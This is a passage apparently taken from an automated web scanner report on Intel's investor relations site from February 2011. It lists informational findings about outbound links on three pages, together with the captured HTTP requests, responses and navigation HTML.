...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_4">
<a href="http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research">Research</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_5">
<a href="http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards">Standards</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/products/index.htm?iid=hdr+product-index">Product Index</a>
...[SNIP]...
<li class="">
<a href="http://communities.intel.com/index.jspa?iid=hdr+communities">Communities</a>
...[SNIP]...
<li class="">
<a href="http://www.intel.com/experience/index.htm?iid=hdr+experience">Experience Intel</a>
...[SNIP]...
</span>

                       <a href="http://newsroom.intel.com/community/intel_newsroom/">INTEL NEWSROOM</a>

                       <a href="http://www.intel.com/jobs/index.htm">JOBS AT INTEL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/capital/index.htm">INTEL CAPITAL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/diversity/index.htm">DIVERSITY</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/museum/index.htm">INTEL MUSEUM</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">F.A.Q.<span class="lowercase">
...[SNIP]...
<li><a href="http://www.intel.com/" title="Home">Home</a>
...[SNIP]...
<li><a href="http://www.intel.com/intel/index.htm?iid=hdr+about" title="About Intel">About&nbsp;Intel</a>
...[SNIP]...
<div class="mini-promo-text">
                               <a href="http://www.theinvestornetwork.com/forum/intc" title="Join the Intel Investors Community" target="_blank">Join the Intel Investors Community&nbsp;&gt;</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms">Terms of Use</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark">*Trademarks</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy">Privacy</a>
...[SNIP]...

17.27. http://www.intc.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intc.com/index.cfm?iid=ftr+invrel
The response contains the following links to other domains:
  • http://apps.shareholder.com/rss/rss.aspx?companyid=INTC&channels=5148
  • http://communities.intel.com/index.jspa?iid=hdr+communities
  • http://newsroom.intel.com/community/intel_newsroom/
  • http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research
  • http://www.intel.com/
  • http://www.intel.com/about/companyinfo/FAQ/index.htm
  • http://www.intel.com/about/companyinfo/capital/index.htm
  • http://www.intel.com/about/companyinfo/diversity/index.htm
  • http://www.intel.com/about/companyinfo/museum/index.htm
  • http://www.intel.com/about/companyinfo/policy/index.htm
  • http://www.intel.com/about/companyinfo/worldahead/index.htm
  • http://www.intel.com/business/index.htm?iid=hdr+business
  • http://www.intel.com/community/index.htm?iid=subhdr+cr_community
  • http://www.intel.com/consumer/index.htm?iid=hdr+home
  • http://www.intel.com/en_US/worldwide.htm
  • http://www.intel.com/experience/index.htm?iid=hdr+experience
  • http://www.intel.com/index.htm
  • http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info
  • http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr
  • http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report
  • http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu
  • http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ
  • http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation
  • http://www.intel.com/intel/index.htm?iid=hdr+about
  • http://www.intel.com/jobs/index.htm
  • http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs
  • http://www.intel.com/p/en_US/support?iid=hdr+support
  • http://www.intel.com/products/index.htm?iid=hdr+product-index
  • http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy
  • http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms
  • http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark
  • http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards
  • http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon
  • http://www.intel.com/technology/index.htm?iid=subhdr+tl
  • http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing
  • http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech
  • http://www.theinvestornetwork.com/forum/intc

Request

GET /index.cfm?iid=ftr+invrel HTTP/1.1
Host: www.intc.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:12:49 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NOMOBILE=0;path=/
Set-Cookie: INTC_SESSION=1158415365%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A48%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A48%27%7D%7CB98F31D77EB5BDC04B24EA248F8FA9B0;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:12:49 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7588889;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:12:49 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:12:49 GMT;path=/
Vary: Accept-Encoding
Content-Length: 37031


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<meta name="Description" content="The Investor Relations home page website contains information about Intel business for stockholders, potential investors, and financial analysts.">        
   
           <link rel="alternate" type="application/rss+xml" title="Intel Investor News" href="http://apps.shareholder.com/rss/rss.aspx?companyid=INTC&channels=5148"/>
       
   <link rel="stylesheet" type="text/css" href="includes/tooltip.css" />
...[SNIP]...
<div id="gaat40-header" class="gaat40-reset gaat40-https">
<a class="gaat40-logo" title="" href="http://www.intel.com/index.htm">
               
               <script type="text/javascript">
...[SNIP]...
<li id="gaat40-locale">
<a href="http://www.intel.com/en_US/worldwide.htm">Change Location</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-hdr_link_bus">
<a href="http://www.intel.com/business/index.htm?iid=hdr+business">For Business</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_home">
<a href="http://www.intel.com/consumer/index.htm?iid=hdr+home">For Home</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_support">
<a href="http://www.intel.com/p/en_US/support?iid=hdr+support">Support</a>
...[SNIP]...
<li class=" gaat40-selected" id="gaat40-hdr_link_about">
<a href="http://www.intel.com/intel/index.htm?iid=hdr+about">About Intel</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_cr">
<a href="http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr">Corporate Responsibility</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_cr_col1_1">
<a href="http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report">Corporate Responsibility Report</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_2">
<a href="http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu">Education</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_3">
<a href="http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ">Environment</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_4">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Healthcare</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_5">
<a href="http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation">Intel Foundation</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_6">
<a href="http://www.intel.com/community/index.htm?iid=subhdr+cr_community">Intel in Your Community</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_7">
<a href="http://www.intel.com/about/companyinfo/worldahead/index.htm">World Ahead</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_info">
<a href="http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info">Company Information</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_info_col1_1">
<a href="http://www.intel.com/about/companyinfo/diversity/index.htm">Diversity</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_2">
<a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">FAQs</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_3">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Intel Capital</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_4">
<a href="http://www.intel.com/about/companyinfo/museum/index.htm">Intel Museum</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_6">
<a href="http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs">Jobs at Intel</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_7">
<a href="http://newsroom.intel.com/community/intel_newsroom/">Intel Newsroom</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_8">
<a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_tech-lead">
<a href="http://www.intel.com/technology/index.htm?iid=subhdr+tl">Technology Leadership</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_tech-lead_col1_1">
<a href="http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon">Architecture and Silicon</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_2">
<a href="http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech">Product Technologies</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_3">
<a href="http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing">Manufacturing</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_4">
<a href="http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research">Research</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_5">
<a href="http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards">Standards</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/products/index.htm?iid=hdr+product-index">Product Index</a>
...[SNIP]...
<li class="">
<a href="http://communities.intel.com/index.jspa?iid=hdr+communities">Communities</a>
...[SNIP]...
<li class="">
<a href="http://www.intel.com/experience/index.htm?iid=hdr+experience">Experience Intel</a>
...[SNIP]...
</span>

                       <a href="http://newsroom.intel.com/community/intel_newsroom/">INTEL NEWSROOM</a>

                       <a href="http://www.intel.com/jobs/index.htm">JOBS AT INTEL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/capital/index.htm">INTEL CAPITAL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/diversity/index.htm">DIVERSITY</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/museum/index.htm">INTEL MUSEUM</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">F.A.Q.<span class="lowercase">
...[SNIP]...
<li><a href="http://www.intel.com/" title="Home">Home</a>
...[SNIP]...
<li><a href="http://www.intel.com/intel/index.htm?iid=hdr+about" title="About Intel">About&nbsp;Intel</a>
...[SNIP]...
<div class="mini-promo-text">
                               <a href="http://www.theinvestornetwork.com/forum/intc" title="Join the Intel Investors Community" target="_blank">Join the Intel Investors Community&nbsp;&gt;</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms">Terms of Use</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark">*Trademarks</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy">Privacy</a>
...[SNIP]...

17.28. http://www.intc.com/releasedetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /releasedetail.cfm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intc.com/releasedetail.cfm?ReleaseID=546454&ReleasesType=Home&ReleasesType=Home
The response contains the following links to other domains:
  • http://communities.intel.com/index.jspa?iid=hdr+communities
  • http://cts.businesswire.com/ct/CT?id=bwnews&sty=20110131006293r1&sid=acqr4&distro=nx
  • http://cts.businesswire.com/ct/CT?id=smartlink&url=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-eventDetails%26c%3D131837%26eventID%3D3711144&esheet=6591363&lan=en-US&anchor=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-eventDetails%26c%3D131837%26eventID%3D3711144&index=5&md5=2c2484cd41561cbb1d6ad7c5f771a3a2
  • http://cts.businesswire.com/ct/CT?id=smartlink&url=http%3A%2F%2Fwww.intc.com%2Fresults.cfm&esheet=6591363&lan=en-US&anchor=www.intc.com%2Fresults.cfm&index=2&md5=fc80b163f62072cb2dd8df125f34b5b8
  • http://cts.businesswire.com/ct/CT?id=smartlink&url=http%3A%2F%2Fwww.intc.com&esheet=6591363&lan=en-US&anchor=www.intc.com&index=3&md5=7d5b7b25a5c64b1f8f0c423e2793a998
  • http://cts.businesswire.com/ct/CT?id=smartlink&url=http%3A%2F%2Fwww.intel.com%2Fpressroom&esheet=6591363&lan=en-US&anchor=www.intel.com%2Fpressroom&index=4&md5=0b0dc7a520905ef0b4f6449a80ff6dd8
  • http://cts.businesswire.com/ct/CT?id=smartlink&url=http%3A%2F%2Fwww.intel.com&esheet=6591363&lan=en-US&anchor=www.intel.com&index=1&md5=bf6e846d47fa2308df2dc0d219e72d75
  • http://newsroom.intel.com/community/intel_newsroom/
  • http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research
  • http://www.intel.com/
  • http://www.intel.com/about/companyinfo/FAQ/index.htm
  • http://www.intel.com/about/companyinfo/capital/index.htm
  • http://www.intel.com/about/companyinfo/diversity/index.htm
  • http://www.intel.com/about/companyinfo/museum/index.htm
  • http://www.intel.com/about/companyinfo/policy/index.htm
  • http://www.intel.com/about/companyinfo/worldahead/index.htm
  • http://www.intel.com/business/index.htm?iid=hdr+business
  • http://www.intel.com/community/index.htm?iid=subhdr+cr_community
  • http://www.intel.com/consumer/index.htm?iid=hdr+home
  • http://www.intel.com/en_US/worldwide.htm
  • http://www.intel.com/experience/index.htm?iid=hdr+experience
  • http://www.intel.com/index.htm
  • http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info
  • http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr
  • http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report
  • http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu
  • http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ
  • http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation
  • http://www.intel.com/intel/index.htm?iid=hdr+about
  • http://www.intel.com/jobs/index.htm
  • http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs
  • http://www.intel.com/p/en_US/support?iid=hdr+support
  • http://www.intel.com/products/index.htm?iid=hdr+product-index
  • http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy
  • http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms
  • http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark
  • http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards
  • http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon
  • http://www.intel.com/technology/index.htm?iid=subhdr+tl
  • http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing
  • http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech

Request

GET /releasedetail.cfm?ReleaseID=546454&ReleasesType=Home&ReleasesType=Home HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A58%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:58 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:58 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:58 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="gaat40-header" class="gaat40-reset gaat40-https">
<a class="gaat40-logo" title="" href="http://www.intel.com/index.htm">
               
               <script type="text/javascript">
...[SNIP]...
<li id="gaat40-locale">
<a href="http://www.intel.com/en_US/worldwide.htm">Change Location</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-hdr_link_bus">
<a href="http://www.intel.com/business/index.htm?iid=hdr+business">For Business</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_home">
<a href="http://www.intel.com/consumer/index.htm?iid=hdr+home">For Home</a>
...[SNIP]...
<li class="" id="gaat40-hdr_link_support">
<a href="http://www.intel.com/p/en_US/support?iid=hdr+support">Support</a>
...[SNIP]...
<li class=" gaat40-selected" id="gaat40-hdr_link_about">
<a href="http://www.intel.com/intel/index.htm?iid=hdr+about">About Intel</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_cr">
<a href="http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr">Corporate Responsibility</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_cr_col1_1">
<a href="http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report">Corporate Responsibility Report</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_2">
<a href="http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu">Education</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_3">
<a href="http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ">Environment</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_4">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Healthcare</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_5">
<a href="http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation">Intel Foundation</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_6">
<a href="http://www.intel.com/community/index.htm?iid=subhdr+cr_community">Intel in Your Community</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_cr_col1_7">
<a href="http://www.intel.com/about/companyinfo/worldahead/index.htm">World Ahead</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_info">
<a href="http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info">Company Information</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_info_col1_1">
<a href="http://www.intel.com/about/companyinfo/diversity/index.htm">Diversity</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_2">
<a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">FAQs</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_3">
<a href="http://www.intel.com/about/companyinfo/capital/index.htm">Intel Capital</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_4">
<a href="http://www.intel.com/about/companyinfo/museum/index.htm">Intel Museum</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_6">
<a href="http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs">Jobs at Intel</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_7">
<a href="http://newsroom.intel.com/community/intel_newsroom/">Intel Newsroom</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_info_col1_8">
<a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_tech-lead">
<a href="http://www.intel.com/technology/index.htm?iid=subhdr+tl">Technology Leadership</a>
...[SNIP]...
<li class="gaat40-first" id="gaat40-sbhdr_about_tech-lead_col1_1">
<a href="http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon">Architecture and Silicon</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_2">
<a href="http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech">Product Technologies</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_3">
<a href="http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing">Manufacturing</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_4">
<a href="http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research">Research</a>
...[SNIP]...
<li class="" id="gaat40-sbhdr_about_tech-lead_col1_5">
<a href="http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards">Standards</a>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/products/index.htm?iid=hdr+product-index">Product Index</a>
...[SNIP]...
<li class="">
<a href="http://communities.intel.com/index.jspa?iid=hdr+communities">Communities</a>
...[SNIP]...
<li class="">
<a href="http://www.intel.com/experience/index.htm?iid=hdr+experience">Experience Intel</a>
...[SNIP]...
</span>

                       <a href="http://newsroom.intel.com/community/intel_newsroom/">INTEL NEWSROOM</a>

                       <a href="http://www.intel.com/jobs/index.htm">JOBS AT INTEL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/capital/index.htm">INTEL CAPITAL</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/diversity/index.htm">DIVERSITY</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/museum/index.htm">INTEL MUSEUM</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/policy/index.htm">Public Policy</a>
                       
                       <a href="http://www.intel.com/about/companyinfo/FAQ/index.htm">F.A.Q.<span class="lowercase">
...[SNIP]...
<li><a href="http://www.intel.com/" title="Home">Home</a>
...[SNIP]...
<li><a href="http://www.intel.com/intel/index.htm?iid=hdr+about" title="About Intel">About&nbsp;Intel</a>
...[SNIP]...
</org>Intel at <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.intel.com&amp;esheet=6591363&amp;lan=en-US&amp;anchor=www.intel.com&amp;index=1&amp;md5=bf6e846d47fa2308df2dc0d219e72d75">www.intel.com</a>
...[SNIP]...
</person>
Stacy J. Smith, vice president and chief financial officer at <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.intc.com%2Fresults.cfm&amp;esheet=6591363&amp;lan=en-US&amp;anchor=www.intc.com%2Fresults.cfm&amp;index=2&amp;md5=fc80b163f62072cb2dd8df125f34b5b8">www.intc.com/results.cfm</a>
...[SNIP]...
</chron>2:30 p.m. PST at <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.intc.com&amp;esheet=6591363&amp;lan=en-US&amp;anchor=www.intc.com&amp;index=3&amp;md5=7d5b7b25a5c64b1f8f0c423e2793a998">www.intc.com</a>
...[SNIP]...
</org>Intel is available at <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.intel.com%2Fpressroom&amp;esheet=6591363&amp;lan=en-US&amp;anchor=www.intel.com%2Fpressroom&amp;index=4&amp;md5=0b0dc7a520905ef0b4f6449a80ff6dd8">www.intel.com/pressroom</a>
...[SNIP]...
</strong>visit <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-eventDetails%26c%3D131837%26eventID%3D3711144&amp;esheet=6591363&amp;lan=en-US&amp;anchor=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-eventDetails%26c%3D131837%26eventID%3D3711144&amp;index=5&amp;md5=2c2484cd41561cbb1d6ad7c5f771a3a2">http://phx.corporate-ir.net/phoenix.zhtml?p=irol-eventDetails&amp;c=131837&amp;eventID=3711144</a>
...[SNIP]...
<p><img alt="" src="http://cts.businesswire.com/ct/CT?id=bwnews&amp;sty=20110131006293r1&amp;sid=acqr4&amp;distro=nx" /></p>
...[SNIP]...
<li class="gaat40-first">
<a href="http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms">Terms of Use</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark">*Trademarks</a>
...[SNIP]...
<li>
<a href="http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy">Privacy</a>
...[SNIP]...

17.29. http://www.intc.com/sec.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /sec.cfm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intc.com/sec.cfm?DocType=Quarterly
The response contains the following links to other domains:
  • http://communities.intel.com/index.jspa?iid=hdr+communities
  • http://newsroom.intel.com/community/intel_newsroom/
  • http://techresearch.intel.com/articles/index.html?iid=subhdr+tl_research
  • http://www.intel.com/
  • http://www.intel.com/about/companyinfo/FAQ/index.htm
  • http://www.intel.com/about/companyinfo/capital/index.htm
  • http://www.intel.com/about/companyinfo/diversity/index.htm
  • http://www.intel.com/about/companyinfo/museum/index.htm
  • http://www.intel.com/about/companyinfo/policy/index.htm
  • http://www.intel.com/about/companyinfo/worldahead/index.htm
  • http://www.intel.com/business/index.htm?iid=hdr+business
  • http://www.intel.com/community/index.htm?iid=subhdr+cr_community
  • http://www.intel.com/consumer/index.htm?iid=hdr+home
  • http://www.intel.com/en_US/worldwide.htm
  • http://www.intel.com/experience/index.htm?iid=hdr+experience
  • http://www.intel.com/index.htm
  • http://www.intel.com/intel/companyinfo/index.htm?iid=subhdr+info
  • http://www.intel.com/intel/corpresponsibility/index.htm?iid=subhdr+cr
  • http://www.intel.com/intel/cr/gcr/overview.htm?iid=subhdr+cr_report
  • http://www.intel.com/intel/education/index.htm?iid=subhdr+cr_edu
  • http://www.intel.com/intel/environment/index.htm?iid=subhdr+cr_environ
  • http://www.intel.com/intel/foundation/index.htm?iid=subhdr+cr_foundation
  • http://www.intel.com/intel/index.htm?iid=hdr+about
  • http://www.intel.com/jobs/index.htm
  • http://www.intel.com/jobs/index.htm?iid=subhdr+info_jobs
  • http://www.intel.com/p/en_US/support?iid=hdr+support
  • http://www.intel.com/products/index.htm?iid=hdr+product-index
  • http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm?iid=ftr+privacy
  • http://www.intel.com/sites/sitewide/en_US/termsofuse.htm?iid=ftr+terms
  • http://www.intel.com/sites/sitewide/en_US/tradmarx.htm?iid=ftr+trademark
  • http://www.intel.com/standards/index.htm?iid=subhdr+tl_standards
  • http://www.intel.com/technology/architecture-silicon/index.htm?iid=subhdr+tl_arch-silicon
  • http://www.intel.com/technology/index.htm?iid=subhdr+tl
  • http://www.intel.com/technology/manufacturing/index.htm?iid=subhdr+tl_manufacturing
  • http://www.intel.com/technology/product/index.htm?iid=subhdr+tl_prod-tech
  • http://www.theinvestornetwork.com/forum/intc

Request

GET /sec.cfm?DocType=Quarterly HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
